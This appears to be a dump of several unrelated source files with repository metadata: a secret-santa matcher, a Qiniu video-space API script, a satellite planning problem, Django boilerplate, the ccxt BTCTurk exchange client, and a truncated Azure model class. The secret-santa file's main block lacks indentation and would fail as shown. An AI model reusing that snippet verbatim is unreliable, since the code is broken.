2017-12-19T09:47:17.000Z
|
2017-12-19T09:47:17.000Z
|
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | null | null | null |
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | null | null | null |
from random import shuffle
class Person:
    """A secret-santa participant, doubly linked to a recipient and a giver."""
    receive_from = None
    send_to = None

    def __init__(self, name):
        self.name = name

    def __repr__(self):
        return "{}\n- giving to {}\n- receiving from {}\n".format(
            self.name, self.send_to.name, self.receive_from.name)


def secret_santa(names):
    """
    Shuffle *names* and link every person to the previous one in the
    shuffled order; the list is circular, so the first person gives to
    the last.  Returns the list of linked Person objects.

    Raises ValueError (a subclass of the previously raised Exception,
    so existing callers still catch it) for None, empty, or single-name
    input.  Note: *names* is shuffled in place, as before.
    """
    if not names or len(names) == 1:
        raise ValueError('invalid input')
    shuffle(names)
    people = [Person(name) for name in names]
    size = len(people)
    for index, person in enumerate(people):
        # Person i gives to i-1 (index -1 wraps to the tail) and receives
        # from (i+1) mod n -- the exact inverse.  Setting both links
        # directly is O(n), replacing the previous O(n^2) name-matching
        # scan, which also mis-linked participants with duplicate names.
        person.send_to = people[index - 1]
        person.receive_from = people[(index + 1) % size]
    return people
if __name__ == "__main__":
matched_people = secret_santa(["john", "joey", "rory"])
[print("{} giving to {}".format(person.name, person.send_to.name))
for person in matched_people]
| 25.446809
| 78
| 0.60786
|
4a0f2da1e368a00c1f07f6b76d1ea60dfb9dff5c
| 1,048
|
py
|
Python
|
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from qiniu import QiniuMacAuth, http
import json
def disableNamespaces(access_key, secret_key, namespaceId):
    """
    Enable a namespace (space).
    https://developer.qiniu.com/qvs/api/6760/enable-the-space
    NOTE(review): despite the function name ("disable..."), the endpoint
    hit below is ".../enabled", i.e. it ENABLES the space -- confirm intent
    before renaming, since callers depend on the current name.
    :param access_key: public key
    :param secret_key: secret key
    :param namespaceId: namespace (space) ID
    :return:
    {
        "code": 200
    }
    """
    auth = QiniuMacAuth(access_key, secret_key)
    # Request URL
    url = f"http://qvs.qiniuapi.com/v1/namespaces/{namespaceId}/enabled"
    # Issue the POST request using Qiniu's MAC-signed helper
    # (note: _post_with_qiniu_mac is a private SDK function).
    ret, res = http._post_with_qiniu_mac(url, None, auth=auth)
    headers = {"code": res.status_code, "reqid": res.req_id, "xlog": res.x_log}
    # Pretty-print the response metadata and body as JSON
    Headers = json.dumps(headers, indent=4, ensure_ascii=False)
    result = json.dumps(ret, indent=4, ensure_ascii=False)
    return Headers, result
# Qiniu account AK / SK (replace the placeholders with real credentials)
access_key = '<access_key>'
secret_key = '<secret_key>'
# ID of the namespace (space) to enable
namespaceId = "2xenzw02hisz2"
headers, result = disableNamespaces(access_key, secret_key, namespaceId)
print(f'{headers}\n{result}')
| 24.372093
| 79
| 0.660305
|
4a0f2dd8872e6eac1068a7967bc8e34f650143e4
| 2,091
|
py
|
Python
|
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
from pyhop_anytime import *
# NOTE(review): 'global' at module scope is a no-op (module-level names are
# already global); kept as-is for byte-compatibility with importers.
global state, goals
# Initial satellite-domain state: which target each instrument calibrates
# against, which satellite each instrument is mounted on, current pointing,
# available power, and the imaging modes each instrument supports.
state = State('state')
state.calibration_target = Oset([('instrument0','star1'),('instrument1','groundstation3'),('instrument10','star0'),('instrument2','groundstation3'),('instrument3','star4'),('instrument4','star2'),('instrument5','star0'),('instrument6','groundstation3'),('instrument7','star4'),('instrument8','star4'),('instrument9','star2')])
state.on_board = Oset([('instrument0','satellite0'),('instrument1','satellite0'),('instrument10','satellite4'),('instrument2','satellite1'),('instrument3','satellite1'),('instrument4','satellite2'),('instrument5','satellite2'),('instrument6','satellite3'),('instrument7','satellite3'),('instrument8','satellite4'),('instrument9','satellite4')])
state.pointing = Oset([('satellite0','star0'),('satellite1','star4'),('satellite2','star1'),('satellite3','groundstation3'),('satellite4','planet10')])
state.power_avail = Oset(['satellite0','satellite1','satellite2','satellite3','satellite4'])
state.supports = Oset([('instrument0','image4'),('instrument1','infrared0'),('instrument1','spectrograph1'),('instrument10','image2'),('instrument10','image4'),('instrument2','image2'),('instrument2','infrared0'),('instrument3','infrared0'),('instrument3','infrared3'),('instrument4','image4'),('instrument4','infrared0'),('instrument4','spectrograph1'),('instrument5','image2'),('instrument5','infrared0'),('instrument5','infrared3'),('instrument6','infrared0'),('instrument6','infrared3'),('instrument7','image4'),('instrument7','infrared3'),('instrument7','spectrograph1'),('instrument8','image4'),('instrument8','spectrograph1'),('instrument9','infrared3')])
# These start empty and are filled in as the planner executes actions.
state.calibrated = Oset()
state.have_image = Oset()
state.power_on = Oset()
# Goal: the (target, mode) images to acquire and the final pointing.
goals = State('goals')
goals.have_image = Oset([('phenomenon13','image4'),('phenomenon14','spectrograph1'),('phenomenon8','image4'),('planet10','infrared3'),('planet5','image4'),('planet9','infrared0'),('star12','image4'),('star15','spectrograph1'),('star16','image2'),('star6','infrared3'),('star7','image4')])
goals.pointing = Oset([('satellite4','planet9')])
| 123
| 662
| 0.705882
|
4a0f2df2fe0888b48ba7a886e73b1d1d7832f07d
| 197
|
py
|
Python
|
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
#!/home/muhammed/Documents/tm/tafseer/src/djangoreactredux/djangoreactreduxenv/bin/python2
# Thin virtualenv wrapper: delegates straight to Django's command-line
# dispatcher (equivalent to running `django-admin`).
from django.core import management
if __name__ == "__main__":
    management.execute_from_command_line()
| 32.833333
| 90
| 0.817259
|
4a0f2f0ee72ca7514e6950d49503068107c0d649
| 150
|
py
|
Python
|
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, Usama and Contributors
# See license.txt
# import frappe
import unittest
class TestPurchaseInvoices(unittest.TestCase):
    """Placeholder test case for the Purchase Invoices doctype (no tests yet)."""
    pass
| 16.666667
| 46
| 0.786667
|
4a0f2fa405ee9923f9035119da40d6f4b2e26506
| 397
|
py
|
Python
|
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
"""
WSGI config for thanosback project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Fall back to this project's settings unless the environment already set one.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'thanosback.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| 23.352941
| 78
| 0.788413
|
4a0f307a701cb59bb2126716cab28fe4ef295583
| 24,157
|
py
|
Python
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 2
|
2021-04-15T22:12:33.000Z
|
2021-09-04T05:29:32.000Z
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 1
|
2021-08-23T16:27:34.000Z
|
2021-08-23T16:27:34.000Z
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 2
|
2020-09-08T01:41:24.000Z
|
2021-04-30T00:07:59.000Z
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.precise import Precise
class btcturk(Exchange):
    """ccxt implementation of the BTCTurk spot exchange REST API."""

    def describe(self):
        """Return the static exchange description (endpoints, fees, capabilities)."""
        return self.deep_extend(super(btcturk, self).describe(), {
            'id': 'btcturk',
            'name': 'BTCTurk',
            'countries': ['TR'],  # Turkey
            'rateLimit': 1000,
            'has': {
                'cancelOrder': True,
                'CORS': True,
                'createOrder': True,
                'fetchBalance': True,
                'fetchMarkets': True,
                'fetchOHLCV': True,
                'fetchOrderBook': True,
                'fetchOpenOrders': True,
                'fetchOrders': True,
                'fetchTicker': True,
                'fetchTickers': True,
                'fetchTrades': True,
                'fetchMyTrades': True,
            },
            'timeframes': {
                '1d': '1d',
            },
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/51840849/87153926-efbef500-c2c0-11ea-9842-05b63612c4b9.jpg',
                'api': {
                    'public': 'https://api.btcturk.com/api/v2',
                    'private': 'https://api.btcturk.com/api/v1',
                    'graph': 'https://graph-api.btcturk.com/v1',
                },
                'www': 'https://www.btcturk.com',
                'doc': 'https://github.com/BTCTrader/broker-api-docs',
            },
            'api': {
                'public': {
                    'get': [
                        'orderbook',
                        'ticker',
                        'trades',   # ?last=COUNT(max 50)
                        'server/exchangeinfo',
                    ],
                },
                'private': {
                    'get': [
                        'users/balances',
                        'openOrders',
                        'allOrders',
                        'users/transactions/trade',
                    ],
                    'post': [
                        'order',
                        'cancelOrder',
                    ],
                    'delete': [
                        'order',
                    ],
                },
                'graph': {
                    'get': [
                        'ohlcs',
                    ],
                },
            },
            'fees': {
                'trading': {
                    'maker': self.parse_number('0.0005'),
                    'taker': self.parse_number('0.0009'),
                },
            },
            'exceptions': {
                'exact': {
                    'FAILED_ORDER_WITH_OPEN_ORDERS': InsufficientFunds,
                    'FAILED_LIMIT_ORDER': InvalidOrder,
                    'FAILED_MARKET_ORDER': InvalidOrder,
                },
            },
        })

    def fetch_markets(self, params={}):
        """Fetch and normalize the list of tradable markets from exchangeinfo."""
        response = self.publicGetServerExchangeinfo(params)
        #
        #     {
        #       "data": {
        #         "timeZone": "UTC",
        #         "serverTime": "1618826678404",
        #         "symbols": [
        #           {
        #             "id": "1",
        #             "name": "BTCTRY",
        #             "nameNormalized": "BTC_TRY",
        #             "status": "TRADING",
        #             "numerator": "BTC",
        #             "denominator": "TRY",
        #             "numeratorScale": "8",
        #             "denominatorScale": "2",
        #             "hasFraction": False,
        #             "filters": [
        #               {
        #                 "filterType": "PRICE_FILTER",
        #                 "minPrice": "0.0000000000001",
        #                 "maxPrice": "10000000",
        #                 "tickSize": "10",
        #                 "minExchangeValue": "99.91",
        #                 "minAmount": null,
        #                 "maxAmount": null
        #               }
        #             ],
        #             "orderMethods": [
        #               "MARKET",
        #               "LIMIT",
        #               "STOP_MARKET",
        #               "STOP_LIMIT"
        #             ],
        #             "displayFormat": "#,###",
        #             "commissionFromNumerator": False,
        #             "order": "1000",
        #             "priceRounding": False
        #           },
        #         },
        #       ],
        #     }
        #
        data = self.safe_value(response, 'data')
        markets = self.safe_value(data, 'symbols', [])
        result = []
        for i in range(0, len(markets)):
            entry = markets[i]
            id = self.safe_string(entry, 'name')
            baseId = self.safe_string(entry, 'numerator')
            quoteId = self.safe_string(entry, 'denominator')
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            symbol = base + '/' + quote
            filters = self.safe_value(entry, 'filters')
            minPrice = None
            maxPrice = None
            minAmount = None
            maxAmount = None
            minCost = None
            # Only the PRICE_FILTER entry carries the limits we need.
            for j in range(0, len(filters)):
                filter = filters[j]
                filterType = self.safe_string(filter, 'filterType')
                if filterType == 'PRICE_FILTER':
                    minPrice = self.safe_number(filter, 'minPrice')
                    maxPrice = self.safe_number(filter, 'maxPrice')
                    minAmount = self.safe_number(filter, 'minAmount')
                    maxAmount = self.safe_number(filter, 'maxAmount')
                    minCost = self.safe_number(filter, 'minExchangeValue')
            status = self.safe_string(entry, 'status')
            active = status == 'TRADING'
            limits = {
                'price': {
                    'min': minPrice,
                    'max': maxPrice,
                },
                'amount': {
                    'min': minAmount,
                    'max': maxAmount,
                },
                'cost': {
                    'min': minCost,
                    'max': None,
                },
            }
            precision = {
                'price': self.safe_integer(entry, 'denominatorScale'),
                'amount': self.safe_integer(entry, 'numeratorScale'),
            }
            result.append({
                'info': entry,
                'symbol': symbol,
                'id': id,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'limits': limits,
                'precision': precision,
                'active': active,
            })
        return result

    def fetch_balance(self, params={}):
        """Fetch per-currency account balances (total/free/used)."""
        self.load_markets()
        response = self.privateGetUsersBalances(params)
        #
        #     {
        #       "data": [
        #         {
        #           "asset": "TRY",
        #           "assetname": "Türk Lirası",
        #           "balance": "0",
        #           "locked": "0",
        #           "free": "0",
        #           "orderFund": "0",
        #           "requestFund": "0",
        #           "precision": 2
        #         }
        #       ]
        #     }
        #
        data = self.safe_value(response, 'data', [])
        result = {
            'info': response,
            'timestamp': None,
            'datetime': None,
        }
        for i in range(0, len(data)):
            entry = data[i]
            currencyId = self.safe_string(entry, 'asset')
            code = self.safe_currency_code(currencyId)
            account = self.account()
            account['total'] = self.safe_string(entry, 'balance')
            account['free'] = self.safe_string(entry, 'free')
            account['used'] = self.safe_string(entry, 'locked')
            result[code] = account
        return self.parse_balance(result)

    def fetch_order_book(self, symbol, limit=None, params={}):
        """Fetch the current order book for *symbol*."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'pairSymbol': market['id'],
        }
        response = self.publicGetOrderbook(self.extend(request, params))
        #     {
        #       "data": {
        #         "timestamp": 1618827901241,
        #         "bids": [
        #           [
        #             "460263.00",
        #             "0.04244000"
        #           ]
        #         ]
        #       }
        #     }
        data = self.safe_value(response, 'data')
        timestamp = self.safe_integer(data, 'timestamp')
        return self.parse_order_book(data, symbol, timestamp, 'bids', 'asks', 0, 1)

    def parse_ticker(self, ticker, market=None):
        """Normalize one raw ticker entry into the unified ccxt ticker shape."""
        #
        #     {
        #       "pair": "BTCTRY",
        #       "pairNormalized": "BTC_TRY",
        #       "timestamp": 1618826361234,
        #       "last": 462485,
        #       "high": 473976,
        #       "low": 444201,
        #       "bid": 461928,
        #       "ask": 462485,
        #       "open": 456915,
        #       "volume": 917.41368645,
        #       "average": 462868.29574589,
        #       "daily": 5570,
        #       "dailyPercent": 1.22,
        #       "denominatorSymbol": "TRY",
        #       "numeratorSymbol": "BTC",
        #       "order": 1000
        #     }
        #
        marketId = self.safe_string(ticker, 'pair')
        symbol = self.safe_symbol(marketId, market)
        timestamp = self.safe_integer(ticker, 'timestamp')
        last = self.safe_number(ticker, 'last')
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': self.safe_number(ticker, 'high'),
            'low': self.safe_number(ticker, 'low'),
            'bid': self.safe_number(ticker, 'bid'),
            'bidVolume': None,
            'ask': self.safe_number(ticker, 'ask'),
            'askVolume': None,
            'vwap': None,
            'open': self.safe_number(ticker, 'open'),
            'close': last,
            'last': last,
            'previousClose': None,
            'change': self.safe_number(ticker, 'daily'),
            'percentage': self.safe_number(ticker, 'dailyPercent'),
            'average': self.safe_number(ticker, 'average'),
            'baseVolume': self.safe_number(ticker, 'volume'),
            'quoteVolume': None,
            'info': ticker,
        }

    def fetch_tickers(self, symbols=None, params={}):
        """Fetch tickers for all (or the given) symbols in one request."""
        self.load_markets()
        response = self.publicGetTicker(params)
        tickers = self.safe_value(response, 'data')
        return self.parse_tickers(tickers, symbols)

    def fetch_ticker(self, symbol, params={}):
        """Fetch the ticker for a single symbol via fetch_tickers."""
        self.load_markets()
        tickers = self.fetch_tickers([symbol], params)
        return self.safe_value(tickers, symbol)

    def parse_trade(self, trade, market=None):
        """Normalize a public or private raw trade into the unified trade shape."""
        #
        # fetchTrades
        #     {
        #       "pair": "BTCUSDT",
        #       "pairNormalized": "BTC_USDT",
        #       "numerator": "BTC",
        #       "denominator": "USDT",
        #       "date": "1618916879083",
        #       "tid": "637545136790672520",
        #       "price": "55774",
        #       "amount": "0.27917100",
        #       "side": "buy"
        #     }
        #
        # fetchMyTrades
        #     {
        #       "price": "56000",
        #       "numeratorSymbol": "BTC",
        #       "denominatorSymbol": "USDT",
        #       "orderType": "buy",
        #       "orderId": "2606935102",
        #       "id": "320874372",
        #       "timestamp": "1618916479593",
        #       "amount": "0.00020000",
        #       "fee": "0",
        #       "tax": "0"
        #     }
        #
        timestamp = self.safe_integer_2(trade, 'date', 'timestamp')
        id = self.safe_string_2(trade, 'tid', 'id')
        order = self.safe_string(trade, 'orderId')
        priceString = self.safe_string(trade, 'price')
        # Private trades report sells with negative amounts -- take abs().
        amountString = Precise.string_abs(self.safe_string(trade, 'amount'))
        price = self.parse_number(priceString)
        amount = self.parse_number(amountString)
        cost = self.parse_number(Precise.string_mul(priceString, amountString))
        marketId = self.safe_string(trade, 'pair')
        symbol = self.safe_symbol(marketId, market)
        side = self.safe_string_2(trade, 'side', 'orderType')
        fee = None
        feeAmountString = self.safe_string(trade, 'fee')
        if feeAmountString is not None:
            feeCurrency = self.safe_string(trade, 'denominatorSymbol')
            fee = {
                'cost': self.parse_number(Precise.string_abs(feeAmountString)),
                'currency': self.safe_currency_code(feeCurrency),
            }
        return {
            'info': trade,
            'id': id,
            'order': order,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'type': None,
            'side': side,
            'takerOrMaker': None,
            'price': price,
            'amount': amount,
            'cost': cost,
            'fee': fee,
        }

    def fetch_trades(self, symbol, since=None, limit=None, params={}):
        """Fetch recent public trades for *symbol* (exchange caps at 50)."""
        self.load_markets()
        market = self.market(symbol)
        # maxCount = 50
        request = {
            'pairSymbol': market['id'],
        }
        if limit is not None:
            request['last'] = limit
        response = self.publicGetTrades(self.extend(request, params))
        #
        #     {
        #       "data": [
        #         {
        #           "pair": "BTCTRY",
        #           "pairNormalized": "BTC_TRY",
        #           "numerator": "BTC",
        #           "denominator": "TRY",
        #           "date": 1618828421497,
        #           "tid": "637544252214980918",
        #           "price": "462585.00",
        #           "amount": "0.01618411",
        #           "side": "sell"
        #         }
        #       ]
        #     }
        #
        data = self.safe_value(response, 'data')
        return self.parse_trades(data, market, since, limit)

    def parse_ohlcv(self, ohlcv, market=None):
        """Convert one raw candle dict into the [ts, o, h, l, c, v] list."""
        #     {
        #        "pair": "BTCTRY",
        #        "time": 1508284800,
        #        "open": 20873.689453125,
        #        "high": 20925.0,
        #        "low": 19310.0,
        #        "close": 20679.55078125,
        #        "volume": 402.216101626982,
        #        "total": 8103096.44443274,
        #        "average": 20146.13,
        #        "dailyChangeAmount": -194.14,
        #        "dailyChangePercentage": -0.93
        #     },
        return [
            self.safe_timestamp(ohlcv, 'time'),
            self.safe_number(ohlcv, 'open'),
            self.safe_number(ohlcv, 'high'),
            self.safe_number(ohlcv, 'low'),
            self.safe_number(ohlcv, 'close'),
            self.safe_number(ohlcv, 'volume'),
        ]

    def fetch_ohlcv(self, symbol, timeframe='1d', since=None, limit=None, params={}):
        """Fetch daily candles from the separate graph API host."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'pair': market['id'],
        }
        if limit is not None:
            request['last'] = limit
        response = self.graphGetOhlcs(self.extend(request, params))
        return self.parse_ohlcvs(response, market, timeframe, since, limit)

    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place an order; generates a client order id when none is supplied."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'orderType': side,
            'orderMethod': type,
            'pairSymbol': market['id'],
            'quantity': self.amount_to_precision(symbol, amount),
        }
        if type != 'market':
            request['price'] = self.price_to_precision(symbol, price)
        if 'clientOrderId' in params:
            request['newClientOrderId'] = params['clientOrderId']
        elif not ('newClientOrderId' in params):
            request['newClientOrderId'] = self.uuid()
        response = self.privatePostOrder(self.extend(request, params))
        data = self.safe_value(response, 'data')
        return self.parse_order(data, market)

    def cancel_order(self, id, symbol=None, params={}):
        """Cancel an open order by its exchange id."""
        request = {
            'id': id,
        }
        return self.privateDeleteOrder(self.extend(request, params))

    def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch open orders; the API returns bids and asks separately."""
        self.load_markets()
        request = {}
        market = None
        if symbol is not None:
            market = self.market(symbol)
            request['pairSymbol'] = market['id']
        response = self.privateGetOpenOrders(self.extend(request, params))
        data = self.safe_value(response, 'data')
        bids = self.safe_value(data, 'bids', [])
        asks = self.safe_value(data, 'asks', [])
        return self.parse_orders(self.array_concat(bids, asks), market, since, limit)

    def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch order history for a symbol (symbol is required by the API)."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'pairSymbol': market['id'],
        }
        if limit is not None:
            # default 100 max 1000
            request['last'] = limit
        if since is not None:
            # API expects seconds, ccxt works in milliseconds.
            request['startTime'] = int(math.floor(since / 1000))
        response = self.privateGetAllOrders(self.extend(request, params))
        #     {
        #       "data": [
        #         {
        #           "id": "2606012912",
        #           "price": "55000",
        #           "amount": "0.0003",
        #           "quantity": "0.0003",
        #           "stopPrice": "0",
        #           "pairSymbol": "BTCUSDT",
        #           "pairSymbolNormalized": "BTC_USDT",
        #           "type": "buy",
        #           "method": "limit",
        #           "orderClientId": "2ed187bd-59a8-4875-a212-1b793963b85c",
        #           "time": "1618913189253",
        #           "updateTime": "1618913189253",
        #           "status": "Untouched",
        #           "leftAmount": "0.0003000000000000"
        #         }
        #       ]
        #     }
        data = self.safe_value(response, 'data')
        return self.parse_orders(data, market, since, limit)

    def parse_order_status(self, status):
        """Map BTCTurk order-status strings onto unified ccxt statuses."""
        statuses = {
            'Untouched': 'open',
            'Partial': 'open',
            'Canceled': 'canceled',
            'Closed': 'closed',
        }
        return self.safe_string(statuses, status, status)

    def parse_order(self, order, market):
        """Normalize a raw order (from fetchOrders or createOrder) into ccxt form."""
        #
        # fetchOrders / fetchOpenOrders
        #     {
        #       "id": 2605984008,
        #       "price": "55000",
        #       "amount": "0.00050000",
        #       "quantity": "0.00050000",
        #       "stopPrice": "0",
        #       "pairSymbol": "BTCUSDT",
        #       "pairSymbolNormalized": "BTC_USDT",
        #       "type": "buy",
        #       "method": "limit",
        #       "orderClientId": "f479bdb6-0965-4f03-95b5-daeb7aa5a3a5",
        #       "time": 0,
        #       "updateTime": 1618913083543,
        #       "status": "Untouched",
        #       "leftAmount": "0.00050000"
        #     }
        #
        # createOrder
        #     {
        #       "id": "2606935102",
        #       "quantity": "0.0002",
        #       "price": "56000",
        #       "stopPrice": null,
        #       "newOrderClientId": "98e5c491-7ed9-462b-9666-93553180fb28",
        #       "type": "buy",
        #       "method": "limit",
        #       "pairSymbol": "BTCUSDT",
        #       "pairSymbolNormalized": "BTC_USDT",
        #       "datetime": "1618916479523"
        #     }
        #
        id = self.safe_string(order, 'id')
        priceString = self.safe_string(order, 'price')
        precisePrice = Precise(priceString)
        price = None
        # Market orders report price "0" -- leave price unset in that case.
        isZero = str(precisePrice) == '0'
        if not isZero:
            # NOTE(review): parse_number is fed a Precise instance here,
            # relying on its string conversion -- confirm against the
            # Exchange.parse_number contract.
            price = self.parse_number(precisePrice)
        amountString = self.safe_string(order, 'quantity')
        amount = self.parse_number(Precise.string_abs(amountString))
        remaining = self.safe_number(order, 'leftAmount')
        # FIX: pairSymbol is a string id("BTCUSDT"); the previous
        # safe_number() call coerced it through number parsing, yielding
        # None and breaking symbol resolution for every parsed order.
        marketId = self.safe_string(order, 'pairSymbol')
        symbol = self.safe_symbol(marketId, market)
        side = self.safe_string(order, 'type')
        type = self.safe_string(order, 'method')
        clientOrderId = self.safe_string(order, 'orderClientId')
        timestamp = self.safe_integer_2(order, 'updateTime', 'datetime')
        rawStatus = self.safe_string(order, 'status')
        status = self.parse_order_status(rawStatus)
        return self.safe_order({
            'info': order,
            'id': id,
            'price': price,
            'amount': amount,
            'remaining': remaining,
            'filled': None,
            'cost': None,
            'average': None,
            'status': status,
            'side': side,
            'type': type,
            'clientOrderId': clientOrderId,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'fee': None,
        })

    def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
        """Fetch the account's own trade history."""
        self.load_markets()
        market = None
        if symbol is not None:
            market = self.market(symbol)
        response = self.privateGetUsersTransactionsTrade()
        #
        #     {
        #       "data": [
        #         {
        #           "price": "56000",
        #           "numeratorSymbol": "BTC",
        #           "denominatorSymbol": "USDT",
        #           "orderType": "buy",
        #           "orderId": "2606935102",
        #           "id": "320874372",
        #           "timestamp": "1618916479593",
        #           "amount": "0.00020000",
        #           "fee": "0",
        #           "tax": "0"
        #         }
        #       ],
        #       "success": True,
        #       "message": "SUCCESS",
        #       "code": "0"
        #     }
        #
        data = self.safe_value(response, 'data')
        return self.parse_trades(data, market, since, limit)

    def nonce(self):
        """Millisecond timestamp used as the request nonce."""
        return self.milliseconds()

    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the signed request; private calls use HMAC-SHA256 over apiKey+nonce."""
        if self.id == 'btctrader':
            raise ExchangeError(self.id + ' is an abstract base API for BTCExchange, BTCTurk')
        url = self.urls['api'][api] + '/' + path
        if (method == 'GET') or (method == 'DELETE'):
            if params:
                url += '?' + self.urlencode(params)
        else:
            body = self.json(params)
        if api == 'private':
            self.check_required_credentials()
            nonce = str(self.nonce())
            secret = self.base64_to_binary(self.secret)
            auth = self.apiKey + nonce
            headers = {
                'X-PCK': self.apiKey,
                'X-Stamp': nonce,
                'X-Signature': self.hmac(self.encode(auth), secret, hashlib.sha256, 'base64'),
                'Content-Type': 'application/json',
            }
        return {'url': url, 'method': method, 'body': body, 'headers': headers}

    def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
        """Raise a mapped exception when the API signals an error code."""
        errorCode = self.safe_string(response, 'code', '0')
        message = self.safe_string(response, 'message')
        output = body if (message is None) else message
        self.throw_exactly_matched_exception(self.exceptions['exact'], message, self.id + ' ' + output)
        if errorCode != '0':
            raise ExchangeError(self.id + ' ' + output)
| 36.601515
| 127
| 0.459867
|
4a0f30fb8a0921c36f784de2a75a6cd9faeac1e2
| 3,509
|
py
|
Python
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
azure-servicefabric/azure/servicefabric/models/stateful_service_info_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-10-16T13:08:23.000Z
|
2018-10-16T13:08:23.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .service_info_py3 import ServiceInfo
class StatefulServiceInfo(ServiceInfo):
    """Information about a stateful Service Fabric service.

    Extends :class:`ServiceInfo` with the stateful-only
    ``has_persisted_state`` flag.

